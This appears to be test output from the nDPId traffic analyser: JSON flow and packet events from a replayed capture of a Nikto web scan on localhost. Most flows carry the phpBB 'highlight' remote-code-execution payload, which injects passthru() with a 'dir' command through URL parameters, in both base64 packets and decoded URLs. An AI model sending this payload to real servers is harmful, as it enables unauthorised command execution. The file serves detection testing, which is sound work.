+00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_packet_id":1,"flow_last_seen":1576420277780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277780,"pkt":"AAAAAAAAAAAAAAAACABFAAFkWxFAAEAG4IB\/AAABfwAAAcbaH5C23mIrVyENVIAYAED\/WAAAAQEICp1m\/zudZv87R0VUIC9waHBCQi9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQoNCg=="} +01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":672,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_packet_id":1,"flow_last_seen":1576420277781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1576420277781,"pkt":"AAAAAAAAAAAAAAAACABFAAFkNVNAAEAGBj9\/AAABfwAAAcbcH5ACfAx1v1NrvIAYAED\/WAAAAQEICp1m\/z2dZv89R0VUIC9mb3J1bS9pbmRleC5waHA\/TmlrdG89Zm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01222{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":673,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7560000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420277781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?Nikto=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001391)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_packet_id":1,"flow_last_seen":1576420277782,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":1576420277782,"pkt":"AAAAAAAAAAAAAAAACABFAAFGytRAAEAGcNt\/AAABfwAAAcbeH5B57PP4Y5pS64AYAED\/OgAAAQEICp1m\/z6dZv8+R0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01191{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":674,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7560000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420277782,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00860{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_packet_id":1,"flow_last_seen":1576420277784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":349,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":349,"pkt_l4_len":315,"thread_ts_msec":1576420277784,"pkt":"AAAAAAAAAAAAAAAACABFAAFPyZ9AAEAGcgd\/AAABfwAAAcbgH5CxOPC81O+RlYAYAED\/QwAAAQEICp1m\/0CdZv8\/R0VUIC9wb3N0bnVrZS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01201{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420277784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_packet_id":1,"flow_last_seen":1576420277785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":354,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":354,"pkt_l4_len":320,"thread_ts_msec":1576420277785,"pkt":"AAAAAAAAAAAAAAAACABFAAFUq9tAAEAGj8Z\/AAABfwAAAcbiH5CAV5MAtOr6\/IAYAED\/SAAAAQEICp1m\/0GdZv9BR0VUIC9wb3N0bnVrZS9odG1sL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420277785,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7560000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_packet_id":1,"flow_last_seen":1576420277786,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":348,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":348,"pkt_l4_len":314,"thread_ts_msec":1576420277786,"pkt":"AAAAAAAAAAAAAAAACABFAAFOulhAAEAGgU9\/AAABfwAAAcbkH5AY64NxSFA9PIAYAED\/QgAAAQEICp1m\/0KdZv9CR0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01200{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":677,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7560000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420277786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_packet_id":1,"flow_last_seen":1576420277788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277788,"pkt":"AAAAAAAAAAAAAAAACABFAAFMGchAAEAGIeJ\/AAABfwAAAcbmH5Ae1yDiPfgPVIAYAED\/QAAAAQEICp1m\/0OdZv9DR0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTIpDQoNCg=="} +01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":678,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277788,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00856{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_packet_id":1,"flow_last_seen":1576420277790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":1576420277790,"pkt":"AAAAAAAAAAAAAAAACABFAAFMIAVAAEAGG6V\/AAABfwAAAcboH5Bd5RklMuM7\/YAYAED\/QAAAAQEICp1m\/0adZv9GR0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01198{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7560000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420277790,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001392)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_packet_id":1,"flow_last_seen":1576420277792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":365,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":365,"pkt_l4_len":331,"thread_ts_msec":1576420277792,"pkt":"AAAAAAAAAAAAAAAACABFAAFfB5NAAEAGNAR\/AAABfwAAAcbqH5CefT66jrIPCIAYAED\/UwAAAQEICp1m\/0idZv9HR0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7560000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420277792,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001393)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7560000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277794,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 